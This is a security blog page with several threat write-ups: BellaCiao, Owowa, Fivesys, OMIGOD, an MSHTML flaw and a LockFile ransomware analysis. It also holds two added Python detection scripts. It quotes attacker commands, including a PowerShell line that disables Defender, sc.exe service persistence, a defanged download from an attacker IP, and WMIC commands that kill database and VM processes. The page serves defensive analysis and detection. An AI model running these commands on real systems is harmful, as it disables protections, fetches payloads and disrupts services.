- Posted in Exploit by

BellaCiao is the most recent advanced trojan host to come from the group APT35/42, otherwise known as Charming Kitten. The malicious code is highly customizable to pinpoint specific targets, down to specific companies and even dedicated subdomains for payload delivery. The attack vector seen so far is Microsoft Exchange servers, but without advanced network IDS/IPS systems, BellaCiao could infiltrate your network without detection.

There is currently no known initial infection vector, as no public logging of one has yet been reported. The intended targets, as chosen by the malware's authors, are infrastructure and other valuable organizations with higher than average security.

Upon deployment on an Exchange server, the malware currently runs the following in PowerShell:

powershell.exe -exec bypass -c Set-MpPreference -DisableRealtimeMonitoring $true

It then creates malicious Windows services to maintain persistence, such as:

sc create "Microsoft Exchange Services Health" binpath= "C:\ProgramData\Microsoft\DRMS\Microsoft Exchange Services Health.exe" start= auto

sc start "Microsoft Exchange Services Health"

sc create "Exchange Agent Diagnostic Services" binpath= "C:\ProgramData\Microsoft\Diagnostic\Exchange Agent Diagnostic Services.exe" start= auto

sc start "Microsoft Exchange Services Health"
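As an added example (not from the original post), the detection logic a defender could run over process-creation telemetry for the two behaviours above: the Defender tampering and the service registrations. The sample events are constructed, and the trusted-directory list is an assumption to adapt to your own estate.

```python
"""Detect BellaCiao-style tampering and persistence in process-creation events
(Sysmon Event ID 1 or Security 4688 command lines): PowerShell switching off
Defender real-time monitoring, and sc.exe registering a service whose binary
lives outside the usual service directories under an Exchange-sounding name.

SAMPLE_EVENTS are constructed for this example; the malicious command lines
reproduce the ones quoted above.
"""
import re
from dataclasses import dataclass

# Set-MpPreference -DisableRealtimeMonitoring $true (any casing, $ optional).
DEFENDER_TAMPER_RE = re.compile(
    r"set-mppreference\b.*-disablerealtimemonitoring\s+\$?true", re.IGNORECASE)

# sc create <name> ... binpath= <path>; name and path may be quoted or bare.
SC_CREATE_RE = re.compile(
    r'\bsc(?:\.exe)?\s+create\s+(?:"(?P<qname>[^"]+)"|(?P<name>\S+))\s.*?'
    r'binpath=\s*(?:"(?P<qpath>[^"]+)"|(?P<path>\S+))',
    re.IGNORECASE)

# Directories legitimate service binaries are normally installed under (assumed).
TRUSTED_SERVICE_ROOTS = (
    "c:\\windows\\",
    "c:\\program files\\",
    "c:\\program files (x86)\\",
)
# Words a rogue service borrows to blend in on an Exchange server.
MASQUERADE_WORDS = ("microsoft", "exchange")


@dataclass
class Finding:
    rule: str
    severity: str
    host: str
    detail: str


def _outside_trusted_roots(binpath: str) -> bool:
    return not binpath.strip().lower().startswith(TRUSTED_SERVICE_ROOTS)


def check_event(event: dict) -> list:
    """Apply both rules to one event; return the findings (possibly none)."""
    cmd, host = event["command_line"], event["host"]
    findings = []
    if DEFENDER_TAMPER_RE.search(cmd):
        findings.append(Finding("defender_realtime_disabled", "high", host, cmd))
    m = SC_CREATE_RE.search(cmd)
    if m:
        name = m.group("qname") or m.group("name")
        binpath = m.group("qpath") or m.group("path")
        if _outside_trusted_roots(binpath):
            mimics = any(w in name.lower() for w in MASQUERADE_WORDS)
            findings.append(Finding("service_binpath_outside_trusted_dirs",
                                    "high" if mimics else "medium", host,
                                    f"service {name!r} -> {binpath}"))
    return findings


def scan(events) -> list:
    return [f for ev in events for f in check_event(ev)]


SAMPLE_EVENTS = [  # constructed telemetry, not real logs
    {"host": "EXCH01", "command_line":
     "powershell.exe -exec bypass -c Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"host": "EXCH01", "command_line":
     'sc create "Microsoft Exchange Services Health" binpath= '
     '"C:\\ProgramData\\Microsoft\\DRMS\\Microsoft Exchange Services Health.exe" start= auto'},
    {"host": "EXCH01", "command_line": 'sc start "Microsoft Exchange Services Health"'},
    {"host": "EXCH01", "command_line":
     'sc create "Exchange Agent Diagnostic Services" binpath= '
     '"C:\\ProgramData\\Microsoft\\Diagnostic\\Exchange Agent Diagnostic Services.exe" start= auto'},
    # Benign administration that must not alert.
    {"host": "FS02", "command_line":
     'sc create AcmeBackup binpath= "C:\\Program Files\\Acme\\backup.exe" start= auto'},
    {"host": "FS02", "command_line": "powershell.exe -c Get-MpPreference"},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.severity}] {f.host} {f.rule}: {f.detail}")
```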

Afterwards, it is recorded that the culprits pushed malicious IIS modules to the affected server. One of them was IIS-Raid, an IIS module designed to act as a man-in-the-middle for credential theft, sniffing IIS traffic for passwords according to a keyword list.

The second module was another custom-made module designed to exfiltrate the data found by the IIS-Raid module; it also captures and records HTTP requests containing the keywords “pass”, “pwd”, “password” or “login” for exfiltration.

BellaCiao installs itself as a Windows service executable to avoid being noticed by users. Because it is both a trojan host and a C2 module, its functions are baked in, and it can also carry a payload within, making it even more unpredictable and dangerous. It sends DNS requests every 24 hours to maintain its connection to the internet and to the attacker. These DNS requests go to a DNS server under the attacker's control, and the server's response is how commands are delivered: the last octet of the returned IP address determines the action to take, matched against the IP addresses hard-coded into the malware.

Functions possible by this method include:

Command execution
Execute script
Download file
Upload file
Upload web logs
Report web server start time
Report current time
Stop web server


Our assessment of this type of attack is that more high-level and automated tools, such as modern IDS/IPS, are needed as part of a defence-in-depth strategy to monitor network traffic and prevent breaches. This malware platform is attacking Exchange servers today, but it can likely be rebuilt to attack other types of network resources. Combined with its ability to infiltrate payloads into a network stealthily, it could wreak more havoc than described in this article. If you aren't sure whether your network security is up to the task, consult a well-known, trusted firm for an assessment of your organization's security and have proper policies in place.

Owowa: A malicious IIS module for data theft.

- Posted in Vulnerability by

Owowa is a Microsoft web server (IIS) module currently tuned to intercept Outlook Web App (OWA) login requests. Exactly how Owowa makes its way onto servers isn't yet fully known as of publishing this post, but it is possible that it is deployed as a reconnaissance tool/sniffer during an initial attack on a network. Once deployed to a server, it intercepts login requests to the targeted Outlook Web instance and funnels the login credentials it finds to whoever deployed it. This means that if your Exchange server is infected, just logging into Outlook to check your email can compromise your email account, give the attacker direct control of it, and lead to phishing campaigns impersonating you. Currently, Owowa's targets have reportedly been governments or government-controlled entities in the Asia-Pacific region, but that can change at any time.

Owowa currently works by monitoring HTTP requests and responses on the infected server for OWA traffic, hooking the “PreSendRequestContent” event; this event is believed to fire only when a web application hosted by IIS is about to send content to a client application, such as an Outlook client. It also verifies that the login was successful by grabbing data from the authentication tokens sent back to the client as access confirmation, which contain the user's login credentials, IP address and timestamp. It is suspected that the attacker can enter certain strings into the OWA login page's username field on an infected server to retrieve the server's credentials log or delete that log, or use the password field to remotely execute PowerShell commands.

The IIS "IHttpModule" interface is what is used for the sniffing. According to Microsoft, hooking that event from an IHttpModule is not recommended as it can lead to server instability and crashes. The attacker, however, is using this approach to retrieve information despite Microsoft considering that this is not how it should be used.

Another part of the danger regarding Owowa is that, without a security regime tuned to look for the type of traffic Owowa sends, the only real way to determine whether Owowa is on your server is a manual investigation of the modules loaded in IIS. We are informed that most or all security platforms are not designed to search for threats like Owowa at the time of this post.
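As an added example that is not part of the post, a baseline comparison of the modules registered in applicationHost.config: the manual IIS module check described above, which also covers native modules like the ones pushed in the BellaCiao post earlier on this page. The configuration fragment is constructed, and the baseline values are assumptions you replace with a golden configuration of your own servers.

```python
"""Audit the IIS module registrations in applicationHost.config against a
known-good baseline. Native modules live in <globalModules> with an image=
path; managed (.NET) modules appear in <modules> with a type= attribute.
Anything not in the baseline, or loaded from an unexpected path, is reported
for review.

SAMPLE_CONFIG is a constructed fragment in applicationHost.config layout;
BASELINE_NATIVE / BASELINE_MANAGED are assumed values, not a real baseline.
"""
import xml.etree.ElementTree as ET
from dataclasses import dataclass

# Native modules (<globalModules>): name -> expected image path.
BASELINE_NATIVE = {
    "UriCacheModule": "%windir%\\System32\\inetsrv\\cachuri.dll",
    "StaticFileModule": "%windir%\\System32\\inetsrv\\static.dll",
}
# Managed modules (<modules> entries carrying a type= attribute) we expect.
BASELINE_MANAGED = {"Session"}
# Where native IIS / ASP.NET module images normally live.
TRUSTED_IMAGE_PREFIXES = (
    "%windir%\\system32\\inetsrv\\",
    "%windir%\\microsoft.net\\",
)


@dataclass
class Finding:
    section: str   # "globalModules" or "modules"
    name: str
    reason: str
    detail: str


def _trusted_image(image: str) -> bool:
    return image.lower().startswith(TRUSTED_IMAGE_PREFIXES)


def audit_modules(config_xml: str) -> list:
    """Return findings for modules that deviate from the baseline."""
    root = ET.fromstring(config_xml)
    findings = []

    # Native modules: unknown name, or a known name pointing at a new image.
    for gm in root.iter("globalModules"):
        for add in gm.findall("add"):
            name, image = add.get("name", ""), add.get("image", "")
            expected = BASELINE_NATIVE.get(name)
            if expected is None:
                where = "trusted dir" if _trusted_image(image) else "UNTRUSTED dir"
                findings.append(Finding("globalModules", name,
                                        f"native module not in baseline ({where})", image))
            elif expected.lower() != image.lower():
                findings.append(Finding("globalModules", name, "image path changed",
                                        f"{image} (baseline: {expected})"))

    # Managed modules: entries with type= that the baseline does not list.
    # (Site-level web.config files can add managed modules too; audit them the same way.)
    for mods in root.iter("modules"):
        for add in mods.findall("add"):
            mtype = add.get("type")
            if mtype is None:
                continue  # reference to a native module; covered above
            name = add.get("name", "")
            if name not in BASELINE_MANAGED:
                findings.append(Finding("modules", name,
                                        "managed module not in baseline", mtype))
    return findings


# Constructed sample: two expected native modules, one unknown native module
# loaded from ProgramData, one expected managed module, one unknown managed module.
SAMPLE_CONFIG = """<configuration>
  <system.webServer>
    <globalModules>
      <add name="UriCacheModule" image="%windir%\\System32\\inetsrv\\cachuri.dll" />
      <add name="StaticFileModule" image="%windir%\\System32\\inetsrv\\static.dll" />
      <add name="HealthCheckModule" image="C:\\ProgramData\\Microsoft\\iishealth.dll" />
    </globalModules>
    <modules>
      <add name="UriCacheModule" lockItem="true" />
      <add name="Session" type="System.Web.SessionState.SessionStateModule" preCondition="managedHandler" />
      <add name="OwaExtender" type="OwaExtender.LoginModule, OwaExtender, Version=1.0.0.0, Culture=neutral, PublicKeyToken=0123456789abcdef" />
    </modules>
  </system.webServer>
</configuration>
"""

if __name__ == "__main__":
    for f in audit_modules(SAMPLE_CONFIG):
        print(f"[{f.section}] {f.name}: {f.reason} -> {f.detail}")
```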

Currently, talk about Owowa is just that: talk. Even Kaspersky researchers, who first discovered Owowa and made its existence public, have not yet taken any protective action. In addition, there is no current discussion of what Owowa could be turned into: it is a snooping tool for IIS currently tuned to steal Exchange credentials, but modifications to its code likely would, and could, allow it to grab any sort of data sent to or from an IIS server. Such a threat could mean that the entire IIS ecosystem is at continuous risk.

Part of my concern about Owowa, and about how dangerous it can be, is that Owowa has reportedly unused, empty modules within its code that could potentially be used (and may already have been) to enhance its current capability.


Owowa may not yet be commonplace, but the threat is significant enough that immediate action should be taken: verify the IIS backend and its configuration on a regular basis, and check regularly for the module and remove it. Owowa is thought to be a reconnaissance tool for an ongoing attack, a post-exploitation tool, or an information grabber for the dark web that will lead to additional exploits, phishing and scams, so proactive steps need to be implemented to help prevent its exploitation.

Fivesys rootkit exploits Microsoft certification system

- Posted in Exploit by

Fivesys is a rootkit that has recently been discovered in the wild. A rootkit is a type of malware designed to install itself in the background on a target machine and to be hard or impossible to detect by normal malware scanning and remediation processes. Rootkits as a class of malware aren't new, but their overall viability has been reduced by countermeasures developed to mitigate the vast majority of rootkits in circulation. The difference with this rootkit is its packaging, which mimics a valid signed driver; it even carries a Microsoft signature.

To date, the purpose of the Fivesys rootkit is to redirect HTTP/HTTPS traffic to the attacker's predefined IP addresses. The current package has a list of 300 different IPs, routed through a proxy, designed to prevent the traffic from being blocked. The package also contains a driver blacklist to prevent it being removed or overwritten with a legitimate package. Bitdefender, the company that made the discovery, thinks that the primary target of Fivesys is online games, with the intent to steal game login credentials and hijack in-game transactions for payment credentials/data. As that cannot be fully verified at this time, we would note that re-programming of the package will likely occur, resulting in Fivesys being weaponized for any number of similar attack vectors.

As outlined in the first paragraph, the major issue with Fivesys is that its creator has managed to pass the package through Microsoft's driver validation program, which we have confirmed is a fully automated signing process with no manual oversight or flag for review. This allows an actor to use the process to bypass all of Windows' inbuilt security features, leaving machines vulnerable until it is discovered.


Our recommendation for preventing Fivesys or any other rootkit from affecting your environment is to be diligent with your downloads by confirming you are on the manufacturer's site. Type the manufacturer's URL manually, do not click on links, and do not use a Google search result link to reach the download. Current exploits in AdSense and other advertising links pointing to legitimate sites with user-uploaded content all pose a real risk of Fivesys being downloaded instead of the legitimate driver/software you are after; see our posts on the AdSense exploit. Make sure all your teams, staff and users are trained in cyber security.

OMIGOD Flaw in Azure on Linux Persists Despite Microsoft Fixes

- Posted in Uncategorized by

Cybercriminals are targeting Linux-based servers running in Microsoft's Azure public cloud that are vulnerable to the OMIGOD flaws, after Microsoft didn't automatically apply the patch to affected clients in its infrastructure.

Recorded Future reports that the attacks began the night of Sept. 16, after an exploit proof-of-concept was published on GitHub. It was noted that about 10 malicious bot servers have been searching the internet for vulnerable systems. In addition, Cado Security researchers in a blog post also noted a tweet from cybersecurity researcher German Fernandez, who found that the infamous DDoS Mirai botnet, known for taking advantage of insecure Internet of Things (IoT) devices, is also exploiting OMIGOD.

The flaws include CVE-2021-38647, which is a remote code execution bug, and three privilege escalation vulnerabilities: CVE-2021-38648, CVE-2021-38645 and CVE-2021-38649. Ohfeld wrote that the researchers offered a conservative estimate that thousands of Azure customers and millions of endpoints are impacted by the flaws.

“Supply chain cyber attacks have disrupted everyday life and dominated headlines this year,” he wrote. “One of the biggest challenges in preventing them is that our digital supply chain is not transparent. If you don’t know what’s hidden in the services and products you use every day, how can you manage the risk?”


Microsoft was quick to issue fixes for the four vulnerabilities in its September release of security updates. The vulnerabilities put a spotlight on the supply-chain risk that Microsoft's open-source code represents, particularly for organizations using cloud computing services, since Microsoft let go its beta testing teams and the community beta testers who used to volunteer their time.

With OMIGOD, the issue relates to the application called Open Management Infrastructure (OMI), which is embedded in many Azure services and is developed by the Microsoft-sponsored open-source OMI project in collaboration with The Open Group.

When users enable any of these popular services, OMI is silently installed on their Virtual Machine by Azure, running at the highest privileges possible. This happens without customers’ explicit consent or knowledge. Users simply click agree to log collection during setup and they have unknowingly opted in to the Microsoft application. Because Azure provides virtually no public documentation about OMI, most customers have never heard of it and are unaware that this attack surface exists in their environment.

The OMI agent runs as root (the highest privileges any user can have) and, accessed either through a Unix socket or through an HTTP API, has unlimited control of the host. In Linux and Unix-based environments, running any application as root is discouraged, and that should be Microsoft's default as well, especially when the application is exposed to the internet; OMI shows that it is not. With OMI so poorly implemented, bad actors can easily gain control of the servers.

“This vulnerability can be also used by attackers to obtain initial access to a target Azure environment and then move laterally within it,” Ohfeld wrote in a technical blog. Thus, an exposed port with such access privileges is a holy grail for malicious attackers: with OMI, one simple exploit gives an attacker access to new targets, lets them execute commands at the highest privileges, and could let them spread exponentially to new target machines.

Recorded Future noted that Microsoft addressed the bug by developing a patched version of the OMI client and releasing it on GitHub, but didn't automatically install the update on OMI clients in its infrastructure, essentially leaving tens of thousands of servers vulnerable. The company also took three days to replace the OMI client version inside its available Azure Linux VM images.

The cybersecurity firm said a query on the Shodan search engine found more than 15,600 Azure Linux servers connected to the internet, all with possible exposure, and these are just the ones known.


  1. Immediately implement the OMI patch.
  2. Remove OMI if it is not needed.
  3. Check and confirm all applications exposed to the internet.
  4. Scan and check all server files, access controls, ports and privileges, and review your user accounts and groups.

Office 365/2019 MSHTML Vulnerability

- Posted in Vulnerability by

An organization named EXPMON discovered an Office 365/2019 vulnerability on September 5th, 2021. The vulnerability lies within MSHTML, the Microsoft Internet Explorer browser engine. It is a remote code execution (RCE) vulnerability, allowing the attacker to remotely install malware on the target machine.


The exploit is performed by an attacker sending a user a modified .docx file. Upon opening, the document runs a script that uses the IE MSHTML engine to open the URL programmed into the document's scripting.

Microsoft has recommended disabling scripts and ActiveX execution, but we are not convinced this is enough, because the base IE11 code is left in the OS. Although Microsoft did not carry the IE code over from legacy Edge when it switched to the new Chromium-based Edge browser, having legacy IE11 code within the OS still makes execution possible, and we recommend removing the base IE11. This is, however, not a guarantee, as Microsoft has not confirmed whether IE11 code exists in other parts of the OS, so the following prevention recommendations should always be followed:

Recommendation

Internet Explorer 11, even if it does not show on your computer, is likely still installed as a background app on your machine, as Microsoft has maintained it for compatibility; it is recommended to remove it. You can do this by searching for "Windows features" in the Windows search bar. Uncheck the Internet Explorer 11 checkbox to remove "Internet Explorer" and the IE11 code. Your PC should request a reboot; click reboot when prompted.


If your business still requires use of Internet Explorer 11 for any reason, contact the developer of the program you are using to ask them to update their codebase to support modern web browsing.

It is important to remember that attachments are often insecure, and even if you have removed the above code, we continue to recommend not opening attachments unless you are absolutely sure of the source; and even then, only once you have confirmed that the source did send it.

The preferred approach is to use a file-sharing system instead of attachments, for example our On The Move server, which is available to all types of business, or another secure option.

LockFile Ransomware: Exploiting Microsoft Exchange Vulnerabilities Using ProxyShell

- Posted in Ransomware by

LockFile ransomware was first seen in July 2021 and has been highly active since then. It has global operations, and most of the victims are from the United States of America and Asia. The ransomware group hosts a website in the TOR network to guide victims to pay the ransom and subsequently get the instructions to decrypt the files. This webpage contains a uTox ID and an email address to contact the Threat Actor (TA), as shown in the figure below.

Darkweb Lockfile

Cyble Researchers found that a few details indicate that the ransomware gang could also be related to the other threat actors from the ransomware website. For example, as mentioned in the ATTENTION section of the website, the last line mentions a wallpaper being provided by lockbit, and the contact email contains a reference to Conti.

Recently, the Threat Actor (TA) behind LockFile has started attacking Microsoft Exchange Servers using the ProxyShell attack. ProxyShell chains the Microsoft Exchange vulnerabilities listed below, resulting in unauthenticated code execution. Orange Tsai, a Principal Security Researcher at Devcore, recently discovered these vulnerabilities. Following is the list of vulnerabilities.

  • CVE-2021-34473 - Pre-auth Path Confusion leads to ACL Bypass (Patched in April by KB5001779)
  • CVE-2021-34523 - Elevation of Privilege on Exchange PowerShell Backend (Patched in April by KB5001779)
  • CVE-2021-31207 - Post-auth Arbitrary-File-Write leads to RCE (Patched in May by KB5003435)

According to a Symantec blog post, after successful exploitation the TA runs the following PowerShell command:

powershell wget hxxp://209.14.0[.]234:46613/VcEtrKighyIFS5foGNXH

What this PowerShell command downloads is unknown, but on August 13, 2021, an independent security researcher captured the associated IP address (209.14.0[.]234). According to the researcher, attackers used this IP to exploit the ProxyShell vulnerability.

Researchers also found that 20 to 30 minutes before deploying the ransomware, the TA drops three files:

An exploit for the PetitPotam vulnerability (CVE-2021-36942), named efspotato.exe.

Two further files: active_desktop_render.dll and active_desktop_launcher.exe

The PetitPotam vulnerability allows the TA to compromise the Domain Controller, which results in the compromise of the complete Active Directory. The PetitPotam technique abuses MS-EFSRPC (Microsoft's Encrypting File System Remote Protocol), which is responsible for performing maintenance and management operations on encrypted data stored on a remote system.

As per Symantec, the executable active_desktop_launcher.exe is legitimate software, but active_desktop_render.dll is a malicious Dynamic Link Library (DLL) that is loaded via a DLL search order hijacking attack. Once loaded, the DLL drops and decrypts desktop.ini in a local directory. This desktop.ini then loads and executes shellcode, which in turn activates efspotato.exe, the exploit for the PetitPotam vulnerability.

Upon compromising the domain, the TA then deploys LockFile ransomware on various systems of the compromised domain.

Cyble Research found one of the LockFile malware samples on the surface web while conducting routine Open-Source Intelligence (OSINT) threat hunting exercises. The figure below shows the high-level execution flow of LockFile ransomware. The malware initially kills all known processes related to virtual machines, databases and other related services. It then iterates through the drives on the system to find fixed logical drives and searches them for files and folders. For each file found, the malware checks the extension, and if it matches one of the pre-defined file extensions, the ransomware encrypts it. After completing the encryption process, it deletes itself.

Exchange execution

Technical Analysis

Cyble's static analysis found that the malware is a Windows x64 console application written in C/C++ and compiled on 2021-07-03 18:15:34, as shown in the figure below.

Details of static analysis

​As shown in the figure below, the malware creates several subprocesses to perform several activities upon execution.

Details of malware execution

The subprocesses kill the running processes shown in Table 1. To do this, the malware uses the Windows Management Instrumentation Command-line (WMIC) tool and passes the process name as a wildcard between % characters. WMIC is a simple command prompt tool that returns information about the system you are running it on.

The list of commands executed by the malware is shown in the table below.

Command                                                                                         Target process
C:\Windows\system32\cmd.exe /c wmic process where "name like '%vmwp%'" call terminate           vmwp
C:\Windows\system32\cmd.exe /c wmic process where "name like '%virtualbox%'" call terminate     virtualbox
C:\Windows\system32\cmd.exe /c wmic process where "name like '%vbox%'" call terminate           vbox
C:\Windows\system32\cmd.exe /c wmic process where "name like '%sqlservr%'" call terminate       sqlservr
C:\Windows\system32\cmd.exe /c wmic process where "name like '%mysqld%'" call terminate         mysqld
C:\Windows\system32\cmd.exe /c wmic process where "name like '%omtsreco%'" call terminate       omtsreco
C:\Windows\system32\cmd.exe /c wmic process where "name like '%oracle%'" call terminate         oracle
C:\Windows\system32\cmd.exe /c wmic process where "name like '%tnslsnr%'" call terminate        tnslsnr
C:\Windows\system32\cmd.exe /c wmic process where "name like '%vmware%'" call terminate         vmware

Table 1: WMIC commands executed by the ransomware to kill processes

Once the ransomware has killed all the processes, it iterates through the victim's machine, encrypts the user's document files and appends the .lockfile extension, as shown in the figure below.


Figure 5: Files encrypted by LockFile

Once the files are encrypted, the malware launches an HTML Application (HTA) file to show the ransom message to the user, as shown in the figure below, and then deletes itself.


Figure 6: Ransom Message Created by LockFile

Code Analysis and Debugging

Upon debugging, the figure below shows that the malware calls a series of WMIC commands to kill various processes. The list of commands is shown in Table 1.


Figure 7: WMIC commands used by LockFile ransomware to kill processes

Once the ransomware kills all the defined processes, it extracts the ransom note content from the executable, as shown below.


Figure 8: Ransom note extracted from LockFile ransomware in memory

Afterward, the malware gets the list of drives using the GetLogicalDriveStringsA Application Programming Interface (API). The drives are then passed one at a time to the GetDriveTypeA API, and the result is compared with 03 (DRIVE_FIXED), which indicates that the drive is fixed media, i.e. a local logical drive, as shown below. Once such a drive is located, the malware creates a thread to conduct further ransomware activity.


Figure 9: Fixed Media checked by LockFile

The malware thread creates LOCKFILE-README.hta in the root, as shown in the figure below.


Figure 10: LockFile’s Thread creating LOCKFILE-README.hta in C:/

Then the ransomware starts iterating through the files and folders. Every file or folder found is passed through the series of checks listed below.

1 – The desktop.ini string is not present in the filename
2 – Windows is not present in the full path
3 – The LOCKFILE string is not present in the filename
4 – The NTUSER string is not present in the filename

The checks are shown in the below code.


Figure 11: Checks performed by LockFile.

Once all the checks are passed, the malware compares the file's extension with a pre-defined extension list embedded in the malware. The code is shown in the figure below.


Figure 12: File Extension Compared by LockFile

For example, in the figure below we can see that the malware is comparing the extension of 36897c.rbf with the .1cd extension.

Figure 13: Ransomware checks the file extension

Similarly, the malware compares each of the extensions shown in Table 2 with the victim's file. This confirms that the malware targets only files with specific extensions.

.lcd .7z .7zip .acccdb .ai .asp .aspx .backup .bak .cd .cdr .cdx .cer .cf .cfl .cfu .config .cs .csv .dat .db .dbf .doc .docx .dt .dwg .edb .efd .elf .epf .erf .fpt .geo .grs .html .ibd .jpeg .ldf .lgf .lgp .log .mdb .mdf .mft .mp3 .mxl .myd .odt .pdf .pff .php .ppt .pptx .ps1 .psd .pst .rar .sln .sql .sqlite .st .tiff .txt .vdi .vhd .vhdx .vmdk .vrp .wdb .xls .xlsx .zip

Table 2: List of file extensions targeted by the ransomware

As shown in Figure 14 below, once a file with one of the defined extensions is found, the malware reads the plaintext content of the file.

Figure 14: Read plaintext content from the victim's file

It then calls another user-defined function to encrypt the content using the Advanced Encryption Standard (AES), as shown below.

Figure 15: Call to the encryption function that encrypts the content

Once the content is encrypted, the malware writes it back to the file and then appends the .lockfile extension to the encrypted file using the MoveFileA API, as shown in the figure below.


Figure 16: Append the .lockfile extension to the user document file

The same activity is shown below in figure 17.

Figure 17: Append the .lockfile extension to the user document file while debugging

Once all the files have been encrypted, the malware creates a ransom note .hta file in the C:\Users\Public directory, as shown in the figure below.


Figure 18: Creates the .hta ransom file in C:\Users\Public

Once the .hta ransom file is created, it calls the CreateProcess API to launch the .hta file using the mshta.exe Windows utility, which executes Microsoft HTML Application (HTA) files.

Figure 19: Launch the .hta ransom file using mshta.exe

Finally, once all the files are encrypted, the malware deletes itself by calling the del command, as shown below.

Figure 20: Use of the del command to delete itself


The threat actors behind LockFile exploit publicly disclosed vulnerabilities in sequence: first ProxyShell to attack Microsoft Exchange Server, then the PetitPotam vulnerability to compromise the Domain Controller. After achieving these two objectives, the TA drops the LockFile ransomware onto the systems.

Based on the ransom notes, Cyble Research Labs speculates that the TA may be creating unique custom variants of the LockFile ransomware for each victim organization.

Cyble Research Labs continuously monitors the LockFile ransomware activity; we will continue to update our readers with our latest findings.


Cyble Research Labs has listed some essential cybersecurity best practices that create the first line of control against attackers. We recommend that our readers follow the suggestions given below:

  • Use a reputed anti-virus and internet security software package on your connected devices.     
  • Conduct regular backup practices and keep those backups offline or in a separate network. 
  • Refrain from opening untrusted links and email attachments without verifying their authenticity. 
  • Turn on the automatic software update feature on your computer, mobile, and other connected devices wherever possible and pragmatic.  
  • Use strong passwords and enforce multi-factor authentication wherever possible. 

MITRE ATT&CK® Techniques

Tactic            Technique ID   Technique Name
Reconnaissance    T1595.002      Active Scanning
Reconnaissance    T1591          Gather Victim Org Information
Reconnaissance    T1593          Search Open Websites/Domains
Initial Access    T1190          Exploit Public-Facing Application
Execution         T1059.001      Command and Scripting Interpreter: PowerShell
Defense Evasion   T1574.001      Hijack Execution Flow: DLL Search Order Hijacking
Lateral Movement  T1210          Exploitation of Remote Services
Impact            T1486          Data Encrypted for Impact

Indicators of Compromise (IoCs):   
